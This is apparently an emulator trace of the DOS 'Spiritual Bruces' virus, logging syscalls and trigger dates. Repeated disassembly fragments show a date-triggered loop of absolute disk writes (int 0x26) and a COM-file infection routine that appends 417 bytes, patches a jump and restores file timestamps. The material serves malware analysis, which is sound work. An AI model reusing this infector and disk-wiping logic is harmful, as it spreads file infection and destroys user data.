2018-12-25T11:46:06.257795106Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.270721035Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.271917978Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.274934033Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.277964642Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.279619122Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.282925569Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.284405044Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.292395564Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.299561277Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.301380308Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.307628874Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.31241921Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.317646068Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.318666035Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.320841216Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.32274853Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.323998277Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.326262356Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.327744427Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.332590724Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.340354227Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.342948418Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.352403415Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.359469054Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.365549521Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.3669338Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.369924708Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.37806217Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.379556548Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.386419548Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.38801536Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.3964048Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.406627895Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.409584876Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.419115792Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.426322022Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.433028848Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.434485264Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.436873881Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.440662693Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.442223668Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.445172583Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.447123171Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.454350802Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.46906058Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.472041658Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.481455436Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.488530787Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.496940652Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.498202632Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.500739701Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.509678Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.510969834Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.513750082Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.516448392Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.524311615Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.53387889Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.53789559Z 26 PC: 12c18 | Set disk transfer address (See above)
2018-12-25T11:46:06.539035773Z 9 PC: 12a47 | Display string (String= 'This is a dummy phile for the Spiritual Bruces virus 1.00!')

{"DateBased":true,"Day":17,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2609,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:06.109593249Z 42 PC: 12b43 | Get date 0x12b43: cmp dh, 0xa
0x12b46: jne 0x12b60
0x12b48: cmp dl, 0x11
0x12b4b: jne 0x12b60
0x12b4d: mov al, 2
0x12b4f: mov cx, 1
0x12b52: lea bx, word ptr [bp + 0x223]
0x12b56: cdq
0x12b57: int 0x26
0x12b59: inc dx
0x12b5a: jae 0x12b57
0x12b5c: inc al
0x12b5e: jmp 0x12b4f
0x12b60: mov di, 0x100
0x12b63: lea si, word ptr [bp + 0x2a1]
0x12b67: movsw word ptr es:[di], word ptr [si]
0x12b68: movsb byte ptr es:[di], byte ptr [si]
0x12b69: lea dx, word ptr [bp + 0x2a4]
0x12b6d: call 0x12c14
0x12b70: lea dx, word ptr [bp + 0x298]

{"DateBased":true,"Day":1,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2609,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:06.148878196Z 42 PC: 12b43 | Get date 0x12b43: cmp dh, 0xa
0x12b46: jne 0x12b60
0x12b48: cmp dl, 0x11
0x12b4b: jne 0x12b60
0x12b4d: mov al, 2
0x12b4f: mov cx, 1
0x12b52: lea bx, word ptr [bp + 0x223]
0x12b56: cdq
0x12b57: int 0x26
0x12b59: inc dx
0x12b5a: jae 0x12b57
0x12b5c: inc al
0x12b5e: jmp 0x12b4f
0x12b60: mov di, 0x100
0x12b63: lea si, word ptr [bp + 0x2a1]
0x12b67: movsw word ptr es:[di], word ptr [si]
0x12b68: movsb byte ptr es:[di], byte ptr [si]
0x12b69: lea dx, word ptr [bp + 0x2a4]
0x12b6d: call 0x12c14
0x12b70: lea dx, word ptr [bp + 0x298]
2018-12-25T11:46:06.151629751Z 26 PC: 12c18 | Set disk transfer address
2018-12-25T11:46:06.152686398Z 78 PC: 12b7b | Find first file
2018-12-25T11:46:06.159059489Z 67 PC: 12b99 | Get or set file attributes
2018-12-25T11:46:06.174271014Z 61 PC: 12ba2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:06.180743135Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:06.186793872Z 66 PC: 12bb6 | Move file pointer
2018-12-25T11:46:06.188100512Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1
0x12bc7: mov word ptr [bp + 0x11e], dx
0x12bcb: call 0x22b02
0x12bce: cdq
0x12bcf: xor cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x2bc]
0x12be5: mov cx, word ptr [bp + 0x2ba]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]
2018-12-25T11:46:06.190688104Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-25T11:46:06.198489433Z 66 PC: 12bd6 | Move file pointer
2018-12-25T11:46:06.199834959Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:06.210209974Z 87 PC: 12bf4 | Get or set file date and time
2018-12-25T11:46:06.21162196Z 62 PC: 12bf8 | Close file
2018-12-25T11:46:06.220057398Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T11:46:06.231008012Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.233555827Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.242823125Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.24875615Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.252595475Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.2535927Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.255684971Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.257511381Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.258394677Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.260893651Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.261882033Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.266468495Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.2762334Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.278701808Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.290304806Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.297624042Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.304100881Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.305469432Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.310750458Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.314080564Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.315529046Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.318628312Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.321126853Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.329141546Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.339186645Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.343093413Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.353133217Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.359796114Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.367149799Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.368804348Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.371189782Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.375307959Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.376703849Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.379351582Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.381478178Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.388721512Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.398208525Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.401348387Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.410793502Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.417098285Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.423943995Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.425454608Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.427747688Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.431653647Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.432924408Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.435319347Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.441984688Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.449199617Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.458767963Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.461835947Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.471728094Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.478748385Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.485778619Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.487160869Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.489705466Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.496599484Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.497642762Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.501959917Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.503717709Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.509837635Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.516183908Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.520095694Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.53114882Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.537468283Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.544580369Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.546474078Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.549034216Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.552447468Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.55400155Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.556789258Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.559239505Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.567758532Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.577928687Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.580816231Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.591020076Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.59800435Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.605549251Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.608096974Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.611168135Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.619810189Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.622487679Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.625491226Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.62721852Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.635458687Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.645567769Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.647968627Z 26 PC: 12c18 | Set disk transfer address (See above)
2018-12-25T11:46:06.649349473Z 9 PC: 12a47 | Display string (String= 'This is a dummy phile for the Spiritual Bruces virus 1.00!')

{"DateBased":true,"Day":17,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2609,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:06.192065508Z 42 PC: 12b43 | Get date 0x12b43: cmp dh, 0xa
0x12b46: jne 0x12b60
0x12b48: cmp dl, 0x11
0x12b4b: jne 0x12b60
0x12b4d: mov al, 2
0x12b4f: mov cx, 1
0x12b52: lea bx, word ptr [bp + 0x223]
0x12b56: cdq
0x12b57: int 0x26
0x12b59: inc dx
0x12b5a: jae 0x12b57
0x12b5c: inc al
0x12b5e: jmp 0x12b4f
0x12b60: mov di, 0x100
0x12b63: lea si, word ptr [bp + 0x2a1]
0x12b67: movsw word ptr es:[di], word ptr [si]
0x12b68: movsb byte ptr es:[di], byte ptr [si]
0x12b69: lea dx, word ptr [bp + 0x2a4]
0x12b6d: call 0x12c14
0x12b70: lea dx, word ptr [bp + 0x298]

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2609,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:06.44423898Z 42 PC: 12b43 | Get date 0x12b43: cmp dh, 0xa
0x12b46: jne 0x12b60
0x12b48: cmp dl, 0x11
0x12b4b: jne 0x12b60
0x12b4d: mov al, 2
0x12b4f: mov cx, 1
0x12b52: lea bx, word ptr [bp + 0x223]
0x12b56: cdq
0x12b57: int 0x26
0x12b59: inc dx
0x12b5a: jae 0x12b57
0x12b5c: inc al
0x12b5e: jmp 0x12b4f
0x12b60: mov di, 0x100
0x12b63: lea si, word ptr [bp + 0x2a1]
0x12b67: movsw word ptr es:[di], word ptr [si]
0x12b68: movsb byte ptr es:[di], byte ptr [si]
0x12b69: lea dx, word ptr [bp + 0x2a4]
0x12b6d: call 0x12c14
0x12b70: lea dx, word ptr [bp + 0x298]
2018-12-25T11:46:06.447343781Z 26 PC: 12c18 | Set disk transfer address
2018-12-25T11:46:06.448445127Z 78 PC: 12b7b | Find first file
2018-12-25T11:46:06.454493106Z 67 PC: 12b99 | Get or set file attributes
2018-12-25T11:46:06.476637604Z 61 PC: 12ba2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:06.487830457Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:06.49452409Z 66 PC: 12bb6 | Move file pointer
2018-12-25T11:46:06.497433088Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1
0x12bc7: mov word ptr [bp + 0x11e], dx
0x12bcb: call 0x22b02
0x12bce: cdq
0x12bcf: xor cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x2bc]
0x12be5: mov cx, word ptr [bp + 0x2ba]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]
2018-12-25T11:46:06.499931854Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-25T11:46:06.50787794Z 66 PC: 12bd6 | Move file pointer
2018-12-25T11:46:06.509552228Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:06.515881169Z 87 PC: 12bf4 | Get or set file date and time
2018-12-25T11:46:06.517167805Z 62 PC: 12bf8 | Close file
2018-12-25T11:46:06.52478634Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T11:46:06.534016832Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.536445257Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.546049131Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.552577116Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.559167976Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.560661119Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.563026616Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.565913202Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.568915936Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.574159228Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.576064515Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.584735059Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.595789761Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.599002744Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.609826799Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.617671805Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.625045492Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.626926219Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.62965523Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.632469187Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.633701839Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.636541345Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.637998544Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.645448045Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.655873137Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.658732006Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.66877432Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.676074225Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.682571961Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.684219063Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.688436521Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.697518161Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.699151898Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.701986292Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.703324247Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.710523184Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.720891865Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.7235516Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.733005318Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.740312545Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.746665693Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.748134021Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.751267589Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.754252236Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.755940967Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.75933819Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.76186664Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.769205168Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.779560661Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.782333228Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.792447806Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.799861656Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.805994822Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.807591358Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.810960035Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.81958956Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.821275675Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.829160975Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.831381453Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.839262806Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.849705908Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.852609093Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.862485704Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.870462423Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.877022308Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.878439539Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.880979659Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.884162696Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.885557228Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.888517851Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.893080686Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.900764887Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.91060213Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.914354111Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.923914736Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.930574807Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.933662695Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.935357066Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.937491062Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.945808604Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.947091355Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.949209584Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.951145301Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.95844776Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.968885332Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.971621908Z 26 PC: 12c18 | Set disk transfer address (See above)
2018-12-25T11:46:06.972636388Z 9 PC: 12a47 | Display string (String= 'This is a dummy phile for the Spiritual Bruces virus 1.00!')